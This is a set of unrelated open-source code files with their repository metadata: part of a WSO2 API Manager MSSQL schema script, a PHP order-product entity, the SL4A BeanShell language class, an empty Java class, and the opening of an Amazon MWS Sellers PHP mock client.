QUOTA_UNIT VARCHAR(10) NULL DEFAULT NULL,
UNIT_TIME INTEGER NOT NULL,
TIME_UNIT VARCHAR(25) NOT NULL,
DESCRIPTION VARCHAR (1024) NULL DEFAULT NULL,
PRIMARY KEY (CONDITION_GROUP_ID),
FOREIGN KEY (POLICY_ID) REFERENCES AM_API_THROTTLE_POLICY(POLICY_ID) ON DELETE CASCADE ON UPDATE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_QUERY_PARAMETER_CONDITION]') AND TYPE IN (N'U'))
CREATE TABLE AM_QUERY_PARAMETER_CONDITION (
QUERY_PARAMETER_ID INTEGER IDENTITY(1,1),
CONDITION_GROUP_ID INTEGER NOT NULL,
PARAMETER_NAME VARCHAR(255) DEFAULT NULL,
PARAMETER_VALUE VARCHAR(255) DEFAULT NULL,
IS_PARAM_MAPPING BIT DEFAULT 1,
PRIMARY KEY (QUERY_PARAMETER_ID),
FOREIGN KEY (CONDITION_GROUP_ID) REFERENCES AM_CONDITION_GROUP(CONDITION_GROUP_ID) ON DELETE CASCADE ON UPDATE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_HEADER_FIELD_CONDITION]') AND TYPE IN (N'U'))
CREATE TABLE AM_HEADER_FIELD_CONDITION (
HEADER_FIELD_ID INTEGER IDENTITY(1,1),
CONDITION_GROUP_ID INTEGER NOT NULL,
HEADER_FIELD_NAME VARCHAR(255) DEFAULT NULL,
HEADER_FIELD_VALUE VARCHAR(255) DEFAULT NULL,
IS_HEADER_FIELD_MAPPING BIT DEFAULT 1,
PRIMARY KEY (HEADER_FIELD_ID),
FOREIGN KEY (CONDITION_GROUP_ID) REFERENCES AM_CONDITION_GROUP(CONDITION_GROUP_ID) ON DELETE CASCADE ON UPDATE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_JWT_CLAIM_CONDITION]') AND TYPE IN (N'U'))
CREATE TABLE AM_JWT_CLAIM_CONDITION (
JWT_CLAIM_ID INTEGER IDENTITY(1,1),
CONDITION_GROUP_ID INTEGER NOT NULL,
CLAIM_URI VARCHAR(512) DEFAULT NULL,
CLAIM_ATTRIB VARCHAR(1024) DEFAULT NULL,
IS_CLAIM_MAPPING BIT DEFAULT 1,
PRIMARY KEY (JWT_CLAIM_ID),
FOREIGN KEY (CONDITION_GROUP_ID) REFERENCES AM_CONDITION_GROUP(CONDITION_GROUP_ID) ON DELETE CASCADE ON UPDATE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_IP_CONDITION]') AND TYPE IN (N'U'))
CREATE TABLE AM_IP_CONDITION (
AM_IP_CONDITION_ID INTEGER IDENTITY(1,1),
STARTING_IP VARCHAR(45) NULL,
ENDING_IP VARCHAR(45) NULL,
SPECIFIC_IP VARCHAR(45) NULL,
WITHIN_IP_RANGE BIT DEFAULT 1,
CONDITION_GROUP_ID INT NULL,
PRIMARY KEY (AM_IP_CONDITION_ID),
FOREIGN KEY (CONDITION_GROUP_ID)
REFERENCES AM_CONDITION_GROUP (CONDITION_GROUP_ID) ON DELETE CASCADE ON UPDATE CASCADE);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_POLICY_GLOBAL]') AND TYPE IN (N'U'))
CREATE TABLE AM_POLICY_GLOBAL (
POLICY_ID INTEGER IDENTITY(1,1),
NAME VARCHAR(512) NOT NULL,
KEY_TEMPLATE VARCHAR(512) NOT NULL,
TENANT_ID INTEGER NOT NULL,
DESCRIPTION VARCHAR(1024) NULL DEFAULT NULL,
SIDDHI_QUERY VARBINARY(MAX) DEFAULT NULL,
IS_DEPLOYED BIT NOT NULL DEFAULT 0,
UUID VARCHAR(256),
PRIMARY KEY (POLICY_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_THROTTLE_TIER_PERMISSIONS]') AND TYPE IN (N'U'))
CREATE TABLE AM_THROTTLE_TIER_PERMISSIONS (
THROTTLE_TIER_PERMISSIONS_ID INTEGER IDENTITY(1,1),
TIER VARCHAR(50) NULL,
PERMISSIONS_TYPE VARCHAR(50) NULL,
ROLES VARCHAR(512) NULL,
TENANT_ID INTEGER NULL,
PRIMARY KEY (THROTTLE_TIER_PERMISSIONS_ID));
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_BLOCK_CONDITIONS]') AND TYPE IN (N'U'))
CREATE TABLE AM_BLOCK_CONDITIONS (
CONDITION_ID INTEGER IDENTITY(1,1),
TYPE varchar(45) DEFAULT NULL,
VALUE varchar(512) DEFAULT NULL,
ENABLED varchar(45) DEFAULT NULL,
DOMAIN varchar(45) DEFAULT NULL,
UUID VARCHAR(256),
PRIMARY KEY (CONDITION_ID),
UNIQUE (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_CERTIFICATE_METADATA]') AND TYPE IN (N'U'))
CREATE TABLE AM_CERTIFICATE_METADATA (
TENANT_ID INTEGER NOT NULL,
ALIAS VARCHAR(255) NOT NULL,
END_POINT VARCHAR(255) NOT NULL,
CERTIFICATE VARBINARY(MAX) DEFAULT NULL,
CONSTRAINT PK_ALIAS PRIMARY KEY (ALIAS)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_CLIENT_CERTIFICATE]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_CLIENT_CERTIFICATE (
TENANT_ID INTEGER NOT NULL,
ALIAS VARCHAR(45) NOT NULL,
API_ID INTEGER NOT NULL,
CERTIFICATE VARBINARY(MAX) NOT NULL,
REMOVED BIT NOT NULL DEFAULT 0,
TIER_NAME VARCHAR(512),
REVISION_UUID VARCHAR(255) NOT NULL DEFAULT 'Current API',
PRIMARY KEY (ALIAS, TENANT_ID, REMOVED, REVISION_UUID),
FOREIGN KEY (API_ID) REFERENCES AM_API(API_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APPLICATION_GROUP_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_APPLICATION_GROUP_MAPPING (
APPLICATION_ID INTEGER NOT NULL,
GROUP_ID VARCHAR(512),
TENANT VARCHAR(255),
PRIMARY KEY (APPLICATION_ID,GROUP_ID,TENANT),
FOREIGN KEY (APPLICATION_ID) REFERENCES AM_APPLICATION(APPLICATION_ID) ON DELETE CASCADE ON UPDATE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_USAGE_UPLOADED_FILES]') AND TYPE IN (N'U'))
CREATE TABLE AM_USAGE_UPLOADED_FILES (
TENANT_DOMAIN VARCHAR(255) NOT NULL,
FILE_NAME VARCHAR(255) NOT NULL,
FILE_TIMESTAMP DATETIME DEFAULT GETDATE(),
FILE_PROCESSED INTEGER DEFAULT 0,
FILE_CONTENT VARBINARY(MAX) DEFAULT NULL,
PRIMARY KEY (TENANT_DOMAIN, FILE_NAME, FILE_TIMESTAMP)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_LC_PUBLISH_EVENTS]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_LC_PUBLISH_EVENTS (
ID INTEGER NOT NULL IDENTITY,
TENANT_DOMAIN VARCHAR(255) NOT NULL,
API_ID VARCHAR(500) NOT NULL,
EVENT_TIME DATETIME DEFAULT GETDATE(),
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_APPLICATION_ATTRIBUTES]') AND TYPE IN (N'U'))
CREATE TABLE AM_APPLICATION_ATTRIBUTES (
APPLICATION_ID INTEGER NOT NULL,
NAME VARCHAR(255) NOT NULL,
VALUE VARCHAR(1024) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (APPLICATION_ID,NAME),
FOREIGN KEY (APPLICATION_ID) REFERENCES AM_APPLICATION (APPLICATION_ID) ON DELETE CASCADE ON UPDATE CASCADE
) ;
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_LABELS]') AND TYPE IN (N'U'))
CREATE TABLE AM_LABELS (
LABEL_ID VARCHAR(50),
NAME VARCHAR(255),
DESCRIPTION VARCHAR(1024),
TENANT_DOMAIN VARCHAR(255),
UNIQUE (NAME,TENANT_DOMAIN),
PRIMARY KEY (LABEL_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_LABEL_URLS]') AND TYPE IN (N'U'))
CREATE TABLE AM_LABEL_URLS (
LABEL_ID VARCHAR(50),
ACCESS_URL VARCHAR(255),
PRIMARY KEY (LABEL_ID,ACCESS_URL),
FOREIGN KEY (LABEL_ID) REFERENCES AM_LABELS(LABEL_ID) ON UPDATE CASCADE ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'AM_SYSTEM_APPS') AND TYPE IN (N'U'))
CREATE TABLE AM_SYSTEM_APPS (
ID INTEGER IDENTITY,
NAME VARCHAR(50) NOT NULL,
CONSUMER_KEY VARCHAR(512) NOT NULL,
CONSUMER_SECRET VARCHAR(512) NOT NULL,
TENANT_DOMAIN VARCHAR(255) DEFAULT 'carbon.super',
CREATED_TIME DATETIME2(6) DEFAULT CURRENT_TIMESTAMP,
UNIQUE (CONSUMER_KEY),
PRIMARY KEY (ID)
);
-- BotDATA Email table--
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_NOTIFICATION_SUBSCRIBER]') AND TYPE IN (N'U'))
CREATE TABLE AM_NOTIFICATION_SUBSCRIBER (
UUID VARCHAR(255),
CATEGORY VARCHAR(255),
NOTIFICATION_METHOD VARCHAR(255),
SUBSCRIBER_ADDRESS VARCHAR(255) NOT NULL,
PRIMARY KEY(UUID, SUBSCRIBER_ADDRESS)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_REVOKED_JWT]') AND TYPE IN (N'U'))
CREATE TABLE AM_REVOKED_JWT (
UUID VARCHAR(255) NOT NULL,
SIGNATURE VARCHAR(2048) NOT NULL,
EXPIRY_TIMESTAMP BIGINT NOT NULL,
TENANT_ID INTEGER DEFAULT -1,
TOKEN_TYPE VARCHAR(15) DEFAULT 'DEFAULT',
TIME_CREATED DATETIME DEFAULT GETDATE(),
PRIMARY KEY (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_CATEGORIES]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_CATEGORIES (
UUID VARCHAR(50),
NAME VARCHAR(255),
DESCRIPTION VARCHAR(1024),
TENANT_ID INTEGER DEFAULT -1,
UNIQUE (NAME,TENANT_ID),
PRIMARY KEY (UUID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_USER]') AND TYPE IN (N'U'))
CREATE TABLE AM_USER (
USER_ID VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(255) NOT NULL,
PRIMARY KEY(USER_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_KEY_MANAGER]') AND TYPE IN (N'U'))
CREATE TABLE AM_KEY_MANAGER (
UUID VARCHAR(50) NOT NULL,
NAME VARCHAR(100) NULL,
DISPLAY_NAME VARCHAR(100) NULL,
DESCRIPTION VARCHAR(256) NULL,
TYPE VARCHAR(45) NULL,
CONFIGURATION VARBINARY(MAX) NULL,
ENABLED BIT DEFAULT 1,
TENANT_DOMAIN VARCHAR(100) NULL,
PRIMARY KEY (UUID),
UNIQUE (NAME,TENANT_DOMAIN)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GW_PUBLISHED_API_DETAILS]') AND TYPE IN (N'U'))
CREATE TABLE AM_GW_PUBLISHED_API_DETAILS (
API_ID varchar(255) NOT NULL,
TENANT_DOMAIN varchar(255),
API_PROVIDER varchar(255),
API_NAME varchar(255),
API_VERSION varchar(255),
API_TYPE varchar(50),
PRIMARY KEY (API_ID)
);
-- AM_GW_PUBLISHED_API_DETAILS & AM_GW_API_ARTIFACTS are independent tables for Artifact synchronizer feature which --
-- should not have any referential integrity constraints with other tables in AM database--
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GW_API_ARTIFACTS]') AND TYPE IN (N'U'))
CREATE TABLE AM_GW_API_ARTIFACTS (
API_ID varchar(255) NOT NULL,
REVISION_ID varchar(255) NOT NULL,
ARTIFACT VARBINARY(MAX),
TIME_STAMP DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (REVISION_ID, API_ID),
FOREIGN KEY (API_ID) REFERENCES AM_GW_PUBLISHED_API_DETAILS(API_ID) ON UPDATE CASCADE ON DELETE NO ACTION
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GW_API_DEPLOYMENTS]') AND TYPE IN (N'U'))
CREATE TABLE AM_GW_API_DEPLOYMENTS (
API_ID VARCHAR(255) NOT NULL,
REVISION_ID VARCHAR(255) NOT NULL,
LABEL VARCHAR(255) NOT NULL,
PRIMARY KEY (REVISION_ID, API_ID,LABEL),
FOREIGN KEY (API_ID) REFERENCES AM_GW_PUBLISHED_API_DETAILS(API_ID) ON UPDATE CASCADE ON DELETE NO ACTION
) ;
-- Tenant Themes Table --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_TENANT_THEMES]') AND TYPE IN (N'U'))
CREATE TABLE AM_TENANT_THEMES (
TENANT_ID INTEGER NOT NULL,
THEME VARBINARY(MAX) NOT NULL,
PRIMARY KEY (TENANT_ID)
);
-- End of API-MGT Tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE AM_SCOPE (
SCOPE_ID INTEGER IDENTITY,
NAME VARCHAR(255) NOT NULL,
DISPLAY_NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(512),
TENANT_ID INTEGER NOT NULL DEFAULT -1,
SCOPE_TYPE VARCHAR(255) NOT NULL,
PRIMARY KEY (SCOPE_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SCOPE_BINDING]') AND TYPE IN (N'U'))
CREATE TABLE AM_SCOPE_BINDING (
SCOPE_ID INTEGER NOT NULL,
SCOPE_BINDING VARCHAR(255) NOT NULL,
BINDING_TYPE VARCHAR(255) NOT NULL,
FOREIGN KEY (SCOPE_ID) REFERENCES AM_SCOPE(SCOPE_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SCOPE_BINDING]') AND TYPE IN (N'U'))
CREATE TABLE AM_REVISION (
ID INTEGER NOT NULL,
API_UUID VARCHAR(256) NOT NULL,
REVISION_UUID VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(255),
CREATED_TIME DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
CREATED_BY VARCHAR(255),
PRIMARY KEY (ID, API_UUID),
UNIQUE(REVISION_UUID)
)ENGINE INNODB;
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_DEPLOYMENT_REVISION_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_DEPLOYMENT_REVISION_MAPPING (
NAME VARCHAR(255) NOT NULL,
VHOST VARCHAR(255) NULL,
REVISION_UUID VARCHAR(255) NOT NULL,
DISPLAY_ON_DEVPORTAL BIT DEFAULT 0,
DEPLOYED_TIME DATETIME NOT NULL DEFAULT CURRENT_TIMESTAMP,
PRIMARY KEY (NAME, REVISION_UUID),
FOREIGN KEY (REVISION_UUID) REFERENCES AM_REVISION(REVISION_UUID) ON UPDATE CASCADE ON DELETE CASCADE
)ENGINE INNODB;
-- Gateway Environments Table --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GATEWAY_ENVIRONMENT]') AND TYPE IN (N'U'))
CREATE TABLE AM_GATEWAY_ENVIRONMENT (
ID INTEGER IDENTITY,
UUID VARCHAR(45) NOT NULL,
NAME VARCHAR(255) NOT NULL,
TENANT_DOMAIN VARCHAR(255),
DISPLAY_NAME VARCHAR(255) NULL,
DESCRIPTION VARCHAR(1023) NULL,
UNIQUE (NAME, TENANT_DOMAIN),
UNIQUE (UUID),
PRIMARY KEY (ID)
)ENGINE INNODB;
-- Virtual Hosts Table --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_GW_VHOST]') AND TYPE IN (N'U'))
CREATE TABLE AM_GW_VHOST (
GATEWAY_ENV_ID INTEGER,
HOST VARCHAR(255) NOT NULL,
HTTP_CONTEXT VARCHAR(255) NULL,
HTTP_PORT VARCHAR(5) NOT NULL,
HTTPS_PORT VARCHAR(5) NOT NULL,
WS_PORT VARCHAR(5) NOT NULL,
WSS_PORT VARCHAR(5) NOT NULL,
FOREIGN KEY (GATEWAY_ENV_ID) REFERENCES AM_GATEWAY_ENVIRONMENT(ID) ON UPDATE CASCADE ON DELETE CASCADE,
PRIMARY KEY (GATEWAY_ENV_ID, HOST)
)ENGINE INNODB;
-- Service Catalog Tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_SERVICE_CATALOG]') AND TYPE IN (N'U'))
CREATE TABLE AM_SERVICE_CATALOG (
UUID VARCHAR(36) NOT NULL,
SERVICE_KEY VARCHAR(100) NOT NULL,
MD5 VARCHAR(100) NOT NULL,
SERVICE_NAME VARCHAR(255) NOT NULL,
DISPLAY_NAME VARCHAR(255) NOT NULL,
SERVICE_VERSION VARCHAR(30) NOT NULL,
SERVICE_URL VARCHAR(2048) NOT NULL,
TENANT_ID INTEGER NOT NULL,
DEFINITION_TYPE VARCHAR(20),
DEFINITION_URL VARCHAR(2048),
DESCRIPTION VARCHAR(1024),
SECURITY_TYPE VARCHAR(50),
MUTUAL_SSL_ENABLED BIT DEFAULT 0,
CREATED_TIME DATETIME NULL,
LAST_UPDATED_TIME DATETIME NULL,
CREATED_BY VARCHAR(255),
UPDATED_BY VARCHAR(255),
SERVICE_DEFINITION VARBINARY(MAX) NOT NULL,
METADATA VARBINARY(MAX) NOT NULL,
PRIMARY KEY (UUID),
CONSTRAINT SERVICE_KEY_TENANT UNIQUE(SERVICE_KEY, TENANT_ID),
CONSTRAINT SERVICE_NAME_VERSION_TENANT UNIQUE (SERVICE_NAME, SERVICE_VERSION, TENANT_ID)
);
-- Webhooks --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_WEBHOOKS_SUBSCRIPTION]') AND TYPE IN (N'U'))
CREATE TABLE AM_WEBHOOKS_SUBSCRIPTION (
WH_SUBSCRIPTION_ID INTEGER IDENTITY,
API_UUID VARCHAR(255) NOT NULL,
APPLICATION_ID VARCHAR(20) NOT NULL,
TENANT_DOMAIN VARCHAR(255) NOT NULL,
HUB_CALLBACK_URL VARCHAR(1024) NOT NULL,
HUB_TOPIC VARCHAR(255) NOT NULL,
HUB_SECRET VARCHAR(2048),
HUB_LEASE_SECONDS INTEGER,
UPDATED_AT TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP,
EXPIRY_AT BIGINT,
DELIVERED_AT TIMESTAMP NULL,
DELIVERY_STATE INTEGER,
PRIMARY KEY (WH_SUBSCRIPTION_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_WEBHOOKS_UNSUBSCRIPTION]') AND TYPE IN (N'U'))
CREATE TABLE AM_WEBHOOKS_UNSUBSCRIPTION (
API_UUID VARCHAR(255) NOT NULL,
APPLICATION_ID VARCHAR(20) NOT NULL,
TENANT_DOMAIN VARCHAR(255) NOT NULL,
HUB_CALLBACK_URL VARCHAR(1024) NOT NULL,
HUB_TOPIC VARCHAR(255) NOT NULL,
HUB_SECRET VARCHAR(2048),
HUB_LEASE_SECONDS INTEGER,
ADDED_AT TIMESTAMP NOT NULL DEFAULT CURRENT_TIMESTAMP
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[AM_API_SERVICE_MAPPING]') AND TYPE IN (N'U'))
CREATE TABLE AM_API_SERVICE_MAPPING (
API_ID INTEGER NOT NULL,
SERVICE_KEY VARCHAR(256) NOT NULL,
MD5 VARCHAR(100) NOT NULL,
TENANT_ID INTEGER NOT NULL,
PRIMARY KEY (API_ID, SERVICE_KEY),
FOREIGN KEY (API_ID) REFERENCES AM_API(API_ID) ON DELETE CASCADE
);
--Performance indexes start--
create index IDX_ITS_LMT on IDN_THRIFT_SESSION (LAST_MODIFIED_TIME);
create index IDX_IOAT_UT on IDN_OAUTH2_ACCESS_TOKEN (USER_TYPE);
create index IDX_AAI_CTX on AM_API (CONTEXT);
create index IDX_AAKM_CK on AM_APPLICATION_KEY_MAPPING (CONSUMER_KEY);
create index IDX_AAUM_AI on AM_API_URL_MAPPING (API_ID);
create index IDX_AAPM_AI on AM_API_PRODUCT_MAPPING (API_ID);
create index IDX_AAUM_TT on AM_API_URL_MAPPING (THROTTLING_TIER);
create index IDX_AATP_DQT on AM_API_THROTTLE_POLICY (DEFAULT_QUOTA_TYPE);
create index IDX_ACG_QT on AM_CONDITION_GROUP (QUOTA_TYPE);
create index IDX_APS_QT on AM_POLICY_SUBSCRIPTION (QUOTA_TYPE);
create index IDX_AS_AITIAI on AM_SUBSCRIPTION (API_ID,TIER_ID,APPLICATION_ID);
create index IDX_APA_QT on AM_POLICY_APPLICATION (QUOTA_TYPE);
create index IDX_AA_AT_CB on AM_APPLICATION (APPLICATION_TIER,CREATED_BY);
-- Performance indexes end--
| chamindias/carbon-apimgt | features/apimgt/org.wso2.carbon.apimgt.core.feature/src/main/resources/sql/mssql.sql | SQL | apache-2.0 | 95,484 |
<?php
namespace Deliveryboy\V1\Rest\Orderproducts;
class OrderproductsEntity {
public $order_product_id;
public $order_id;
public $order_product_name;
public $order_item_id;
public $order_offer_id;
public $order_type;
public $package_id;
public $unit_price;
public $total_price;
public $quantity;
public function getArrayCopy() {
return array(
'order_product_id' => $this->order_product_id,
'order_id' => $this->order_id,
'order_product_name' => $this->order_product_name,
'order_item_id' => $this->order_item_id,
'order_offer_id' => $this->order_offer_id,
'order_type' => $this->order_type,
'package_id' => $this->package_id,
'unit_price' => $this->unit_price,
'total_price' => $this->total_price,
'quantity' => $this->quantity,
);
}
public function exchangeArray(array $array) {
$this->order_product_id = $array['order_product_id'];
$this->order_id = $array['order_id'];
$this->order_product_name = $array['order_product_name'];
$this->order_item_id = $array['order_item_id'];
$this->order_offer_id = $array['order_offer_id'];
$this->order_type = $array['order_type'];
$this->package_id = $array['package_id'];
$this->unit_price = $array['unit_price'];
$this->total_price = $array['total_price'];
$this->quantity = $array['quantity'];
}
}
| ankuradhey/laundry | api/module/Deliveryboy/src/Deliveryboy/V1/Rest/Orderproducts/OrderproductsEntity.php | PHP | apache-2.0 | 1,519 |
/*
* Copyright (C) 2016 Google Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package com.googlecode.android_scripting.language;
import com.googlecode.android_scripting.rpc.ParameterDescriptor;
/**
* Represents the BeanShell programming language.
*
* @author [email protected] (Igor Karp)
*/
public class BeanShellLanguage extends Language {
@Override
protected String getImportStatement() {
// FIXME(igor.v.karp): this is interpreter specific
return "source(\"/sdcard/com.googlecode.bshforandroid/extras/bsh/android.bsh\");\n";
}
@Override
protected String getRpcReceiverDeclaration(String rpcReceiver) {
return rpcReceiver + " = Android();\n";
}
@Override
protected String getMethodCallText(String receiver, String method,
ParameterDescriptor[] parameters) {
StringBuilder result =
new StringBuilder().append(getApplyReceiverText(receiver)).append(getApplyOperatorText())
.append(method);
if (parameters.length > 0) {
result.append(getLeftParametersText());
} else {
result.append(getQuote());
}
String separator = "";
for (ParameterDescriptor parameter : parameters) {
result.append(separator).append(getValueText(parameter));
separator = getParameterSeparator();
}
result.append(getRightParametersText());
return result.toString();
}
@Override
protected String getApplyOperatorText() {
return ".call(\"";
}
@Override
protected String getLeftParametersText() {
return "\", ";
}
@Override
protected String getRightParametersText() {
return ")";
}
}
| kuri65536/sl4a | android/Common/src/com/googlecode/android_scripting/language/BeanShellLanguage.java | Java | apache-2.0 | 2,132 |
/*
* Copyright [2017]
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.netpet.spools.book.insidethejavavirtualmachine.chapter18;
/**
* @Desc javap -verbose / javap -c Hello.class 查看字节码文件
* Created by woncz on 2017/8/18.
*/
public class Hello {
}
| WindsorWang/Spools | spools-book/src/main/java/com/netpet/spools/book/insidethejavavirtualmachine/chapter18/Hello.java | Java | apache-2.0 | 789 |
<?php
/*******************************************************************************
* Copyright 2009-2014 Amazon Services. All Rights Reserved.
* Licensed under the Apache License, Version 2.0 (the "License");
*
* You may not use this file except in compliance with the License.
* You may obtain a copy of the License at: http://aws.amazon.com/apache2.0
* This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
*******************************************************************************
* PHP Version 5
* @category Amazon
* @package Marketplace Web Service Sellers
* @version 2011-07-01
* Library Version: 2014-10-20
* Generated: Fri Oct 17 18:34:06 GMT 2014
*/
class MarketplaceWebServiceSellers_Mock implements MarketplaceWebServiceSellers_Interface
{
// Public API ------------------------------------------------------------//
/**
* Get Service Status
* Returns the service status of a particular MWS API section. The operation
* takes no input.
* All API sections within the API are required to implement this operation.
*
* @param mixed $request array of parameters for MarketplaceWebServiceSellers_Model_GetServiceStatus request or MarketplaceWebServiceSellers_Model_GetServiceStatus object itself
* @see MarketplaceWebServiceSellers_Model_GetServiceStatus
* @return MarketplaceWebServiceSellers_Model_GetServiceStatusResponse
*
* @throws MarketplaceWebServiceSellers_Exception
*/
public function getServiceStatus($request)
{
return MarketplaceWebServiceSellers_Model_GetServiceStatusResponse::fromXML($this->_invoke('GetServiceStatus'));
}
/**
* List Marketplace Participations
* Returns a list of marketplaces that the seller submitting the request can sell in,
* and a list of participations that include seller-specific information in that marketplace.
*
* @param mixed $request array of parameters for MarketplaceWebServiceSellers_Model_ListMarketplaceParticipations request or MarketplaceWebServiceSellers_Model_ListMarketplaceParticipations object itself
* @see MarketplaceWebServiceSellers_Model_ListMarketplaceParticipations
* @return MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsResponse
*
* @throws MarketplaceWebServiceSellers_Exception
*/
public function listMarketplaceParticipations($request)
{
return MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsResponse::fromXML($this->_invoke('ListMarketplaceParticipations'));
}
/**
* List Marketplace Participations By Next Token
* Returns the next page of marketplaces and participations using the NextToken value
* that was returned by your previous request to either ListMarketplaceParticipations or
* ListMarketplaceParticipationsByNextToken.
*
* @param mixed $request array of parameters for MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsByNextToken request or MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsByNextToken object itself
* @see MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsByNextToken
* @return MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsByNextTokenResponse
*
* @throws MarketplaceWebServiceSellers_Exception
*/
public function listMarketplaceParticipationsByNextToken($request)
{
return MarketplaceWebServiceSellers_Model_ListMarketplaceParticipationsByNextTokenResponse::fromXML($this->_invoke('ListMarketplaceParticipationsByNextToken'));
}
// Private API ------------------------------------------------------------//
